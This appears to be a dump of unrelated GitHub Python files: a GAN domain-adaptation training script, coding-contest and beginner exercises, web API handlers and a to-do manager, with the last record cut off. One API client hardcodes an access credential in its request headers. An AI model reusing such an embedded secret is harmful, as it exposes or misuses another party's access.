rate update\r\n\r\n# In[53]:\r\n\r\n\r\ndef show_tsne(xr, xl, yr, yl, xfr, xfl, yfr, yfl, epoch):\r\n import sklearn\r\n from sklearn.manifold import TSNE\r\n tsne = TSNE(n_components=2, random_state=0)\r\n X = np.concatenate((xr, yr, xfr, yfr), axis=0)\r\n X_2d = tsne.fit_transform(X)\r\n from matplotlib import pyplot as plt\r\n plt.figure(figsize=(6, 5))\r\n colors = np.array(['r', 'g', 'b', 'c', 'm', 'y', 'k', 'grey', 'orange', 'purple'])\r\n plt.scatter(X_2d[:batchsize, 0], X_2d[:batchsize, 1], c=colors[xl], marker=\"o\", label=[\"source\"])\r\n for i in range(batchsize):\r\n plt.text(X_2d[batchsize+i, 0], X_2d[batchsize+i, 1], str(yl[i]), color=colors[yl[i]], label=\"target\")\r\n plt.scatter(X_2d[batchsize:batchsize*2, 0], X_2d[batchsize:batchsize*2, 1], c=colors[yl], marker=\"*\", label=[\"target\"])\r\n plt.scatter(X_2d[batchsize*2:batchsize*3, 0], X_2d[batchsize*2:batchsize*3, 1], 
marker=\"_\", c=colors[xfl], label=\"source fake\")\r\n plt.scatter(X_2d[batchsize*3:batchsize*4, 0], X_2d[batchsize*3:batchsize*4, 1], marker=\"+\", c=colors[yfl], label=\"target fake\")\r\n plt.legend()\r\n plt.savefig(experiment +'/tsne_%05d.pdf'%(epoch), bbox_inches='tight',format=\"pdf\", dpi = 300)\r\n plt.close()\r\n\r\n\r\n\r\n# ## Main\r\n\r\n# ##### Directories organization\r\n\r\n# In[13]:\r\n\r\n\r\n\r\nname = s + \"two\" + t\r\nexperiment = \"Experiment_DASPOT/\" + name\r\nos.system('mkdir {0}'.format(experiment))\r\nstdout_backup = sys.stdout\r\nsys.stdout = Logger(experiment +\"/log.txt\",\"w\", stdout_backup)\r\nmanualseed = random.randint(1, 10000) \r\n\r\nrandom.seed(manualseed)\r\ntorch.manual_seed(manualseed)\r\n\r\n\r\n# ##### Cuda\r\n\r\n# In[14]:\r\n\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device(\"cuda:0\")\r\n import torch.backends.cudnn as cudnn\r\n cudnn.benchmark = True\r\nelse:\r\n device = torch.device(\"cpu\")\r\n\r\n\r\n# ##### Dataset loaders\r\n\r\n# In[19]:\r\n\r\n\r\ndataset1 = createDataset(s, True)\r\ndataset2 = createDataset(t, True)\r\ndataset3 = createDataset(t, False)\r\n\r\ndataloader_x = torch.utils.data.DataLoader(dataset1, batch_size=batchsize,\r\n shuffle=True, num_workers=int(procs), pin_memory=True, drop_last = True)\r\ndataloader_y_ans = torch.utils.data.DataLoader(dataset2, batch_size=batchsize,\r\n shuffle=True, num_workers=int(procs), pin_memory=True, drop_last = True)\r\ndataloader_y = torch.utils.data.DataLoader(dataset3, batch_size=batchsize,\r\n shuffle=True, num_workers=int(procs), pin_memory=True)\r\n\r\n\r\n# ##### Nets\r\n\r\n# In[21]:\r\n\r\n\r\nnetCl = CoDis28x28(*DataAttDict[s],*DataAttDict[t]).to(device)\r\nnetD_1 = nn.Conv2d(20, 1, kernel_size=12, stride=1, padding=0).to(device)\r\nnetD_2 = nn.Sequential(\r\n nn.Conv2d(500, 100, kernel_size=1, stride=1, padding=0),\r\n nn.PReLU(),\r\n nn.Conv2d(100, 1, kernel_size=1, stride=1, padding=0)\r\n ).to(device)\r\nnetGen = CoGen28x28(*DataAttDict[s],*DataAttDict[t], zsize=z_dim).to(device)\r\n\r\n\r\n# ##### Optimizer setup\r\n\r\n# In[26]:\r\n\r\n\r\noptimizerCl = optim.Adam([p for p in netCl.parameters() if p.requires_grad], lr=lrCl, betas=(beta1, beta2), weight_decay=weight_decay)\r\noptimizerD = optim.Adam([p for p in netD_1.parameters() if p.requires_grad]+[p for p in netD_2.parameters() if p.requires_grad], lr=lrCl, betas=(beta1, beta2), weight_decay=weight_decay)\r\noptimizerGen = optim.Adam([p for p in netGen.parameters() if p.requires_grad], lr=lrGen, betas=(beta1, beta2), weight_decay=weight_decay)\r\n\r\n\r\n# ##### Loss criterion \r\n\r\n# In[27]:\r\n\r\n\r\ncriterion = nn.CrossEntropyLoss()\r\nc_loss = C_contour().to(device)\r\n\r\n\r\n# ##### GAN training\r\n\r\n# In[ ]:\r\n\r\n\r\nbest_test_acc = 0\r\nx_noise = torch.randn(batchsize, z_dim).to(device)\r\nfixed_noise = x_noise\r\nfixed_x = None\r\nfixed_y = None\r\n\r\n\r\ny_iter = InfIter(dataloader_y_ans)\r\nx_iter = InfIter(dataloader_x)\r\nfor i in range(tot_iter):\r\n netCl.train()\r\n netD_1.train()\r\n netD_2.train()\r\n netGen.train()\r\n for in_iter in range(2):\r\n netCl.zero_grad()\r\n netD_1.zero_grad()\r\n netD_2.zero_grad()\r\n\r\n y, y_labels = next(y_iter)\r\n x, x_labels = next(x_iter)\r\n z = torch.randn(batchsize, z_dim).to(device)\r\n\r\n x = x.to(device)\r\n y = y.to(device)\r\n x_labels = x_labels.to(device)\r\n\r\n # GAN training\r\n x_f, y_f = netGen(z)\r\n x_3,x_2,x_1, y_3,y_2,y_1 = netCl(x,y)\r\n x_3_f,x_2_f,_, y_3_f,y_2_f,_ = netCl(x_f.detach(), y_f.detach())\r\n\r\n errD_xy 
= loss(netD_1(x_1.detach())) \r\n errD_xy += loss(-netD_1(y_1.detach())) \r\n errD_xy += loss(netD_2(x_2.detach())) \r\n errD_xy += loss(-netD_2(y_2.detach())) \r\n errD_xy.backward()\r\n optimizerD.step()\r\n\r\n errD_xy = loss(-netD_1(x_1)) \r\n errD_xy += loss(netD_1(y_1)) \r\n errD_xy += loss(-netD_2(x_2.detach())) \r\n errD_xy += loss(netD_2(y_2.detach())) \r\n\r\n\r\n errD_x_real = loss(x_3) \r\n errD_y_real = loss(y_3) \r\n errD_x_fake = loss(-x_3_f) \r\n errD_y_fake = loss(-y_3_f) \r\n D_x_real = x_3.mean().item()\r\n D_y_real = y_3.mean().item()\r\n D_x_fake = x_3_f.mean().item()\r\n D_y_fake = y_3_f.mean().item()\r\n\r\n x_out = netCl.pred_fromrep(x_2)\r\n #netCl.eval()\r\n x_out_f = netCl.pred_fromrep(x_2_f)\r\n #netCl.train()\r\n\r\n x_prob_fake = F.softmax(x_out_f, dim=1)\r\n x_maxprob_fake,x_label_fake = x_prob_fake.max(dim=1)\r\n select_indices = x_maxprob_fake>0.9\r\n ys_rep_fake = y_2_f[select_indices,:,:,:]\r\n if(ys_rep_fake.shape[0]==0):\r\n errCl_x = 0\r\n else:\r\n ys_label = x_label_fake[select_indices].detach()\r\n ys_out_fake = netCl.pred_fromrep(ys_rep_fake)\r\n if ys_rep_fake.shape[0]==1:\r\n ys_out_fake = ys_out_fake[None, :]\r\n errCl_x = criterion(ys_out_fake,ys_label) \r\n\r\n\r\n optloss = ((x_2_f-y_2_f)**2).sum()/batchsize \r\n errCl_x += criterion(x_out,x_labels) \r\n # GAN training for y\r\n lossCl = errD_x_real+errD_y_real+errD_x_fake+errD_y_fake+optloss+errCl_x+errD_xy\r\n lossCl.backward()\r\n optimizerCl.step()\r\n \r\n netGen.zero_grad()\r\n\r\n x_f, y_f = netGen(z)\r\n x_3_f,x_2_f,_,y_3_f,y_2_f,_ = netCl(x_f, y_f)\r\n errD_x_fake = loss(x_3_f) \r\n errD_y_fake = loss(y_3_f) \r\n D_x_fake = x_3_f.mean().item()\r\n D_y_fake = y_3_f.mean().item()\r\n\r\n # train optimal transport loss\r\n optloss = ((x_2_f-y_2_f)**2).sum()/batchsize #+ opt_contour_loss(x_fake,y_fake) * OPTlossscale2\r\n\r\n # Total Loss\r\n total_loss = errD_x_fake+errD_y_fake+optloss\r\n total_loss.backward()\r\n\r\n optimizerGen.step()\r\n\r\n pred = torch.argmax(x_out,dim=-1)\r\n train_acc = torch.sum(pred==x_labels).item()/len(pred)\r\n\r\n if i%100==0:\r\n print('Iter: [%d/%d] D_x_real: %.4f, D_x_fake: %.4f, D_y_real: %.4f, D_y_fake: %.4f, Loss_GANx: %.4f, Loss_GANy: %.4f, Loss_OPT: %.4f, Loss_P: %.4f, Train Accu: %.4f' %\r\n (i, tot_iter, D_x_real, D_x_fake, D_y_real, D_y_fake, errD_x_real.item()+errD_x_fake.item(), errD_y_real.item()+errD_y_fake.item(), optloss.item(), errCl_x.item(), train_acc))\r\n\r\n netCl.eval()\r\n # show tsne\r\n if i%t_iter == 0:\r\n if fixed_x is None:\r\n fixed_x = x.clone()\r\n fixed_y = y.clone()\r\n fixed_xlabel = x_labels.to(\"cpu\").long().numpy()\r\n fixed_ylabel = y_labels.to(\"cpu\").long().numpy()\r\n if fixed_x.shape[1] == fixed_y.shape[1]:\r\n real_images = torch.cat((fixed_x, fixed_y), 2)\r\n elif fixed_x.shape[1] == 1:\r\n real_images = torch.cat((torch.cat((fixed_x,fixed_x,fixed_x), 1), fixed_y), 2)\r\n else:\r\n real_images = torch.cat((fixed_x, torch.cat((fixed_y,fixed_y,fixed_y), 1)), 2)\r\n torchvision.utils.save_image(real_images.data, experiment +'/realimage.jpg')\r\n _,fixedx_rep = netCl.pred_s(fixed_x)\r\n _,fixedy_rep = netCl.pred_t(fixed_y)\r\n fixed_x_fake, fixed_y_fake = netGen(fixed_noise)\r\n fixedx_rep_fake_l,fixedx_rep_fake = netCl.pred_s(fixed_x_fake)\r\n fixedx_rep_fake_l = fixedx_rep_fake_l.argmax(dim=1)\r\n fixedy_rep_fake_l,fixedy_rep_fake = netCl.pred_t(fixed_y_fake)\r\n fixedy_rep_fake_l = fixedy_rep_fake_l.argmax(dim=1)\r\n if fixed_x_fake.shape[1] == fixed_y_fake.shape[1]:\r\n fake_images = 
torch.cat((fixed_x_fake, fixed_y_fake), 2)\r\n elif fixed_x_fake.shape[1] == 1:\r\n fake_images = torch.cat((torch.cat((fixed_x_fake,fixed_x_fake,fixed_x_fake), 1), fixed_y_fake), 2)\r\n else:\r\n fake_images = torch.cat((fixed_x_fake, torch.cat((fixed_y_fake,fixed_y_fake,fixed_y_fake), 1)), 2)\r\n torchvision.utils.save_image(fake_images.data, experiment +'/fakeimage_%05d.jpg'%(i))\r\n show_tsne(\r\n fixedx_rep.to(\"cpu\").detach().numpy(),\r\n fixed_xlabel,\r\n fixedy_rep.to(\"cpu\").detach().numpy(),\r\n fixed_ylabel,\r\n fixedx_rep_fake.to(\"cpu\").detach().numpy(),\r\n fixedx_rep_fake_l,\r\n fixedy_rep_fake.to(\"cpu\").detach().numpy(),\r\n fixedy_rep_fake_l,\r\n i)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"dayeont/ML_project","sub_path":"DASPOT.py","file_name":"DASPOT.py","file_ext":"py","file_size_in_byte":28605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9742337058","text":"#!/usr/bin/env python3\nfrom collections import Counter\nimport itertools\nimport copy\nfrom itertools import product\n\n\ndef count_black(array):\n    flatten = itertools.chain.from_iterable(array)\n    c = Counter(flatten)\n    return c[\"#\"]\n\n\ndef red_row(array, i):\n    length = len(array[0])\n    array[i] = [\"r\"] * length\n    return array\n\n\ndef red_col(array, j):\n    for row in array:\n        row[j] = \"r\"\n    return array\n\n\nH, W, K = map(int, input().split())\nC = []\n\nfor _ in range(H):\n    row = list(input())\n    C.append(row)\n\ntotal = 0\n\nrow_select_patterns = product([True, False], repeat=H)\ncol_select_patterns = list(product([True, False], repeat=W))\n\nfor row_select_pattern in row_select_patterns:\n    for col_select_pattern in col_select_patterns:\n        c = copy.deepcopy(C)\n\n        # paint each selected row/column once instead of re-painting\n        # them inside a nested loop (same result, fewer redundant calls)\n        for i, i_flag in enumerate(row_select_pattern):\n            if i_flag:\n                c = red_row(c, i)\n\n        for j, j_flag in enumerate(col_select_pattern):\n            if j_flag:\n                c = red_col(c, j)\n\n        if count_black(c) == K:\n            total += 1\n\nprint(total)\n","repo_name":"rmaruon/atcoder-workspace","sub_path":"contests/abc173/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18439782245","text":"\"\"\"This example shows how to use ebonite with tensorflow<2.0.0\"\"\"\n\nimport logging\nfrom typing import Dict, List, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\n\nimport ebonite\nfrom ebonite.runtime import run_model_server\n\ntf_logger = logging.getLogger('tensorflow')\ntf_logger.setLevel(logging.ERROR)\n\n\ndef train_regression() -> Tuple[tf.Session, Union[tf.Tensor, List[tf.Tensor]], Dict[tf.Tensor, np.array]]:\n \"\"\"This function emulates data scientist's work. It produces a tf.Session with trained regression model and\n some sample data in feed_dict format\"\"\"\n learning_rate = 0.01\n training_epochs = 10\n n_samples = 20\n\n weight = 0.5\n bias = -2\n\n rng = np.random\n\n train_X = rng.uniform(-10, 10, (n_samples,))\n train_Y = train_X * weight + bias + rng.uniform(-0.1, 0.1, train_X.shape)\n\n X = tf.placeholder(\"float\", name='X')\n Y = tf.placeholder(\"float\", name='y')\n W = tf.Variable(rng.randn(), name=\"weight\")\n b = tf.Variable(rng.randn(), name=\"bias\")\n\n pred = tf.add(tf.multiply(X, W), b)\n mse = tf.reduce_sum(tf.pow(pred - Y, 2)) / (2 * n_samples)\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(mse)\n\n sess = tf.Session()\n\n # Run the initializer\n sess.run(tf.global_variables_initializer())\n\n # Fit all training data\n for epoch in range(training_epochs):\n for (x, y) in zip(train_X, train_Y):\n sess.run(optimizer, feed_dict={X: x, Y: y})\n\n train_mse = sess.run(mse, feed_dict={X: train_X, Y: train_Y})\n print('train mse', train_mse)\n # Testing example\n test_X = rng.uniform(-10, 10, (n_samples,))\n test_Y = test_X * weight + bias\n test_mse = sess.run(mse, feed_dict={X: test_X, Y: test_Y})\n print('test mse', test_mse)\n return sess, pred, {X: test_X}\n\n\ndef main():\n # obtain session, output tensor and feed_dict\n session, tensor, feed_dict = train_regression()\n\n # in provided session, create model 'tf_model' from output tensor and sample data\n with session.as_default():\n model = ebonite.create_model(tensor, feed_dict, 'tf_model')\n\n # run flask service with this model\n run_model_server(model)\n # now you can use client.py to call this service or go to http://localhost:9000/apidocs to view swagger ui\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zyfra/ebonite","sub_path":"examples/tensorflow_model/train_and_serve.py","file_name":"train_and_serve.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"69"}
+{"seq_id":"30915951263","text":"from sanic.response import json, text\nfrom mongoengine.errors import NotUniqueError\nimport datetime\nimport json as pyjson\nfrom bson import json_util\nfrom copy import deepcopy\n\n# src module\nfrom handler import APIHandler\nfrom model import User, Task\nfrom web import error, generateSessionToken, log, AccountLock, validate, Authenticated, AuthenticatedError\n\nclass index(APIHandler):\n\n    def get(self, requests):\n        '''Query tasks'''\n        where = self.query_constraint(requests)\n        # If what comes back is not a list, an error occurred\n        if isinstance(where, tuple):\n            return error(where[0], {'msg': where[1]})\n\n        users = list()\n        for user in User.get_users(where):\n            users.append(user)\n\n        data = {\n            'body': {'results': users}\n        }\n        return json(**data)\n\n    def post(self, requests):\n        '''Create a new task'''\n        data = requests.json\n        # Check whether the user is logged in\n        session = requests.headers.get('X-LC-Session')\n        where = self.query_constraint(requests)\n        user = next(User.get_users(where, sessionToken=session, raw=True)).first()\n\n        if user is None:\n            return error(211)\n\n        if not isinstance(data, dict) or data is None:\n            return error(107)\n\n        if 'title' not in data:\n            return error(301)\n        # if User.objects(username=request['username']).first() is not None:\n        #     return error(202)\n\n        # Generate sessionToken\n        # sessionToken = generateSessionToken()\n        data.update({\n            # 'title': data.get('title').decode('utf-8'),\n            # 'desc': data.get('desc').decode('utf-8'),\n            'own': user.id,\n            'createdAt': datetime.datetime.utcnow(),\n            'updatedAt': datetime.datetime.utcnow(),\n        })\n        print(data)\n        task = Task(**data)\n        task.save()\n\n        body = deepcopy(data)\n        body.update({\n            # 'title': body['title'].encode('utf-8'),\n            'own': str(body['own']),\n            'createdAt': data['createdAt'].isoformat(),\n            'updatedAt': data['updatedAt'].isoformat()\n        })\n\n        # print(body)\n        result = {\n            'body': body,\n            'headers': {'Location': '/tasks/{}'.format(task.id)},\n            'status': 201\n        }\n        # print(result)\n        # return text(str(result))\n        return json(**result)\n        # task = Task(**)\n","repo_name":"xiaojieluo/webnav","sub_path":"src/handler/TaskHandler.py","file_name":"TaskHandler.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74968301339","text":"from model.state import *\nfrom model.memory import *\nimport tkinter as tk\nfrom tkinter import filedialog, simpledialog, colorchooser\nfrom boardview import BoardView\nfrom controller import Controller\nimport json\n\n#create new game\ndef newcmd():\n rows = simpledialog.askinteger('Input', 'How many rows?', minvalue=3, parent=root)\n cols = simpledialog.askinteger('Input', 'How many columns?', minvalue=14, parent=root)\n sz = 3 if rows % 2 else 2\n bdv.discard_tiles()\n load_history(History(rows, cols, sz))\n#save current game\ndef saveascmd():\n save_file = filedialog.asksaveasfilename()\n with open(save_file, 'w') as sf:\n json.dump(controller.cache.hist.__dict__, sf)\n#open saved game\ndef opencmd():\n open_file = filedialog.askopenfilename()\n with open(open_file) as of:\n histdict = json.load(of)\n bdv.discard_tiles()\n load_history(History(**histdict))\n\ndef load_history(history):\n cache = Cache(history)\n board = cache.latest\n root.geometry(str(max(board.cols*40,800))+'x'+str(board.rows*40)+'+400+200')\n bdv.setup(controller, board.rows, board.cols)\n cache.link_gui(controller, bdv)\n#set colors of display\ndef set_color(player, base=False):\n rgb, color = colorchooser.askcolor()\n if base:\n bdv.basecolors[player] = color\n else:\n bdv.colors[player] = color\n bdv.set_view(controller.cache.latest)\n\n\nroot = tk.Tk()\nroot.title(\"Conquid\")\nroot.option_add('*tearOff', False)\nmenubar = tk.Menu(root)\nroot['menu'] = menubar\n# file menu creation\nfilemenu = tk.Menu(menubar)\nmenubar.add_cascade(menu=filemenu, label=\"File\")\nfilemenu.add_command(label='New', command=newcmd)\nfilemenu.add_command(label='Open', command=opencmd)\nfilemenu.add_command(label='Save As', command=saveascmd)\n# color menu creation\ncolormenu = tk.Menu(menubar)\nmenubar.add_cascade(menu=colormenu, label=\"Colors\")\ncolormenu.add_command(label='Player 1 Base', command=lambda:set_color(1,base=True))\ncolormenu.add_command(label='Player 1 Cell', command=lambda:set_color(1))\ncolormenu.add_command(label='Player 2 Base', command=lambda:set_color(2,base=True))\ncolormenu.add_command(label='Player 2 Cell', command=lambda:set_color(2))\n\n# controller and boardview setup\nbutton_frame = tk.Frame(root)\nturn_box = tk.Label(button_frame,text='PLAYER 1 TURN', width=15)\nbdv = BoardView(root, turn_box)\ncontroller = Controller()\ncontroller.boardview = bdv\n\n#move buttons\nmove_btns = {}\nmove_btns['A'] = tk.Button(button_frame, relief='groove', text='acquire', width=8, command=lambda:controller.button_pressed('A'))\nroot.bind('', lambda e: move_btns['A'].invoke())\nmove_btns['C'] = tk.Button(button_frame, relief='groove', text='conquer', width=8, command=lambda:controller.button_pressed('C'))\nroot.bind('', lambda e: move_btns['C'].invoke())\nmove_btns['V'] = tk.Button(button_frame, relief='groove', text='vanquish', width=8, command=lambda:controller.button_pressed('V'))\nroot.bind('', lambda e: move_btns['V'].invoke())\nmove_btns['Q'] = tk.Button(button_frame, relief='groove', text='conquest', width=8, command=lambda:controller.button_pressed('Q'))\nroot.bind('', lambda e: move_btns['Q'].invoke())\n#undo and confirm\nundo_btn = tk.Button(button_frame, relief='groove', text='undo', width=8, command=controller.undo)\nroot.bind('', lambda e: undo_btn.invoke())\nconfirm_btn = tk.Button(button_frame,relief='groove', text='confirm', width=8, command=controller.confirm)\nroot.bind('', lambda e: confirm_btn.invoke())\n#playback\nprev_btn = tk.Button(button_frame,relief='groove', 
text='<<', width=10, command=controller.prev_board)\nroot.bind('', lambda e: prev_btn.invoke())\npause_play = tk.Button(button_frame,relief='groove', text='#', width=10, command=controller.pauseplay)\nroot.bind('', lambda e: pause_play.invoke())\nnext_btn = tk.Button(button_frame,relief='groove', text='>>', width=10, command=controller.next_board)\nroot.bind('', lambda e: next_btn.invoke())\n#link to controller\ncontroller.link_buttons(move_btns, undo_btn, confirm_btn, prev_btn, pause_play, next_btn)\n\n#pack\nbutton_frame.pack(side='bottom')\nmove_btns['A'].grid(row=0, column=0)\nmove_btns['C'].grid(row=0, column=1)\nmove_btns['V'].grid(row=0, column=2)\nmove_btns['Q'].grid(row=0, column=3)\nturn_box.grid(row=0, column=4)\nundo_btn.grid(row=0, column=5)\nconfirm_btn.grid(row=0, column=6)\nprev_btn.grid(row=0, column=7)\npause_play.grid(row=0,column=8)\nnext_btn.grid(row=0, column=9)\n#rev it up\nload_history(History(14, 28, 2))\nroot.focus()\nroot.mainloop()\n","repo_name":"TortCode/ConquidPy","sub_path":"Conquid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12741617122","text":"import numpy as np\nimport cgt\nfrom cgt import nn, core\n\ndef test_flatvec():\n    cgt.reset_config()\n    cgt.set_precision('double')\n    cgt.core.update_config(backend=\"python\") # XXX\n\n    N = 10\n    K = 3\n\n    Xval = np.random.randn(N,K)\n    wval = np.random.randn(K)\n    bval = np.random.randn()\n    yval = np.random.randn(N)\n\n    X_nk = cgt.shared(Xval, \"X\")\n    y_n = cgt.shared(yval, \"y\")\n    w_k = cgt.shared(wval, \"w\")\n    b = cgt.shared(bval, name=\"b\")\n\n    ypred = cgt.dot(X_nk, w_k) + b\n\n    err = cgt.sum(cgt.square(ypred - y_n))\n    g = cgt.grad(err, [w_k, b])\n    g = core.simplify(g)\n\n    pars = [w_k, b]\n    flatx = nn.setup_contiguous_storage(pars)\n    f = cgt.function([], [err,cgt.flatcat(g)])\n","repo_name":"joschu/cgt","sub_path":"cgt/tests/_test_flatvec.py","file_name":"_test_flatvec.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"69"}
+{"seq_id":"16233691850","text":"banco = {'04954199158':\n         {'CPF':'04954199158',\n          'Nome':'Daniel Sottovia Gomide',\n          'Idade':22,\n          'Curso':'Engenharia Mecânica'}}\n\ndef checagem(CPF,banco):\n    cont = 0\n    for individuos in banco:\n        if CPF == individuos:\n            cont += 1\n    if cont == 0:\n        return True\n    else:\n        return False\n\ndef cadastro(banco):\n    CPF = str(input('CPF: '))\n    while CPF != '-1':\n        if checagem(CPF, banco):\n            nome = str(input('Nome: '))\n            idade = int(input('Idade: '))\n            while idade <= 0:\n                idade = int(input('Idade: '))\n            curso = str(input('Curso: '))\n            banco[CPF] = {'CPF': CPF, 'Nome': nome,\n                          'Idade': idade, 'Curso':curso}\n        else:\n            print('CPF já existente!!!')\n            print('Informe outro CPF ou -1 para parar o cadastro.')\n            CPF = str(input('CPF: '))\n            continue\n        print('Para continuar o cadastramento insira um novo CPF ou digite -1.')\n        CPF = str(input('CPF: '))\n    return banco\n\ndef consulta(banco):\n    dados = str(input('CPF à consultar: '))\n    for cpf in banco:\n        if cpf == dados:\n            return print(banco[cpf])\n\ndef deletar(banco):\n    dados = str(input('CPF à remover: '))\n    cont = 0\n    for cpf in banco:\n        if cpf == dados:\n            cont += 1\n            del banco[cpf]\n            print('Cadastro excluído!')\n            print(banco)\n            return banco\n    if cont == 0:\n        print('CPF não encontrado.')\n        return banco\n\ndef interface(banco):\n    while True:\n        pergunta = str(input('Adicionar: 1 \\nRemover: 2 \\nConsultar: 3 \\nDigite a sua escolha: '))\n        if pergunta == '1':\n            banco = cadastro(banco)\n        elif pergunta == '2':\n            banco = deletar(banco)\n        elif pergunta == '3':\n            consulta(banco)\n        else:\n            print('Obrigado pela atenção!!!')\n            break\n\ninterface(banco)\n","repo_name":"Daniel-Sottovia/INE5603","sub_path":"Exercícios/cadastro.py","file_name":"cadastro.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32770297324","text":"import json\n\ntasks = {}\n\ndef load_tasks():\n try:\n with open('tasks.json', 'r') as f:\n return json.load(f)\n except (FileNotFoundError, json.JSONDecodeError):\n return {}\n\ndef save_tasks():\n with open('tasks.json', 'w') as f:\n json.dump(tasks, f)\n\ndef edit_task():\n task_name = input(\"Enter the name of the task to edit: \")\n if task_name in tasks:\n new_task_name = input(\"Enter the new name of the task: \")\n tasks[new_task_name] = tasks.pop(task_name)\n print(f\"Task '{task_name}' has been renamed to '{new_task_name}'.\")\n status = input(f\"Mark task '{new_task_name}' as completed? (y/n): \")\n if status.lower() == 'y':\n tasks[new_task_name] = True\n print(f\"Task '{new_task_name}' has been marked as completed.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n\ntasks = load_tasks()\n\nwhile True:\n action = input(\"Would you like to add, edit, remove, complete, or uncomplete a task? Type 'list', 'save', or 'quit' to exit: \")\n \n if action == \"add\":\n task_name = input(\"Enter the name of the task: \")\n tasks[task_name] = False\n print(f\"Task '{task_name}' has been added to the to-do list.\")\n elif action == \"edit\":\n edit_task()\n elif action == \"remove\":\n task_name = input(\"Enter the name of the task to remove: \")\n if task_name in tasks:\n del tasks[task_name]\n print(f\"Task '{task_name}' has been removed from the to-do list.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n elif action == \"complete\":\n task_name = input(\"Enter the name of the task to complete: \")\n if task_name in tasks:\n tasks[task_name] = True\n print(f\"Task '{task_name}' has been marked as completed.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n elif action == \"uncomplete\":\n task_name = input(\"Enter the name of the task to uncomplete: \")\n if task_name in tasks:\n tasks[task_name] = False\n print(f\"Task '{task_name}' has been marked as not completed.\")\n else:\n print(f\"Task '{task_name}' was not found in the to-do list.\")\n elif action == \"list\":\n print(\"Current to-do list:\")\n for task_name, completed in tasks.items():\n status = \"completed\" if completed else \"not completed\"\n print(f\"- {task_name} ({status})\")\n elif action == \"save\":\n save_tasks()\n print(\"To-do list saved to file.\")\n elif action == \"quit\":\n save_tasks()\n break\n else:\n print(\"Invalid action. Please type 'add', 'edit', 'remove', 'complete', 'uncomplete', 'list', 'save', or 'quit'.\")\n","repo_name":"Neurorazor/30-Days-of-Python","sub_path":"ToDo /task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"74968301339","text":"# -*- encoding: utf-8 -*-\nimport requests\n\ndef api_connector():\n    headers = {'Content-Type': 'application/json',\n               'credential': 'ZGpzOTAzaWZuc2Zpb25kZnNubm5u',}\n    servername = \"api.moni.com.ar\"\n\n    return servername, headers\n\ndef get_prestamo(dni):\n    servername, headers = api_connector()\n    URL = \"https://\" + servername + \"/api/v4/scoring/pre-score/\" + str(dni)\n    \n    response = requests.request(\"GET\",URL, headers=headers)\n    if response.status_code == 200:\n        response_json = response.json()\n        has_error = response_json.get(\"has_error\")\n        status = response_json.get(\"status\")\n\n        return status, has_error\n    # keep the return shape consistent on non-200 responses\n    return None, None","repo_name":"nbalmaceda/Prueba-tec","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22155116171","text":"num = int(input(\"Digite um número inteiro: \"))\n\nprimo = True\ndiv = 2\n\nwhile div < num:\n if num % div == 0:\n primo = False\n break\n div += 1\n\nif primo and num > 1:\n print('primo')\nelse:\n print('não primo')\n\n","repo_name":"andreztz/exercicios","sub_path":"ListaDeExercicios-3/exercicio-5.py","file_name":"exercicio-5.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13897042057","text":"#-----------------------------------------------------\n# Mimas: conference submission and review system\n# (c) Allan Kelly 2016-2020 http://www.allankelly.net\n# Licensed under MIT License, see LICENSE file\n# -----------------------------------------------------\n\n# System imports\n\n# Google imports\nimport logging\n\nfrom google.appengine.ext import ndb\n\n# Local imports\nimport roundreviews\nimport basehandler\nfrom submission_lib import submissionrecord\n\n\nclass ClassicReviewDecisionPage(basehandler.BaseHandler):\n\n def make_page(self, crrt_conf):\n review_round = int(self.request.get(\"round\"))\n tracks = crrt_conf.mapped_track_obects()\n crrt_track = self.request.get(\"track\", default_value=tracks.keys()[0])\n\n submissions = self.sorted_submissions(crrt_conf, crrt_track, review_round)\n\n template_values = {\n 'crrt_conf': crrt_conf,\n \"track_objects\": tracks,\n \"crrt_track\": crrt_track,\n \"submissions\": submissions,\n \"submissions_len\": len(submissions),\n \"decisions\": submissionrecord.get_decision_summary(crrt_conf.key, crrt_track, review_round),\n \"decision_maker\": crrt_conf.user_rights().has_decision_right_for_round(\n self.get_crrt_user().email(), review_round),\n \"review_round\": review_round,\n \"track_slots\": crrt_conf.mapped_track_obects()[crrt_track].slots,\n }\n\n self.write_page('subreview_lib/classicreviewdecisionpage.html', template_values)\n\n def sorted_submissions(self, crrt_conf, crrt_track, review_round):\n submissions = submissionrecord.retrieve_conference_submissions_by_track_and_round(\n crrt_conf.key, crrt_track, review_round)\n\n if self.request.params.has_key(\"mean\"):\n sorted = submissionrecord.sort_submissions_by_mean_high_to_low(submissions, review_round)\n else:\n sorted = submissionrecord.sort_submissions_by_total_high_to_low(submissions, review_round)\n return 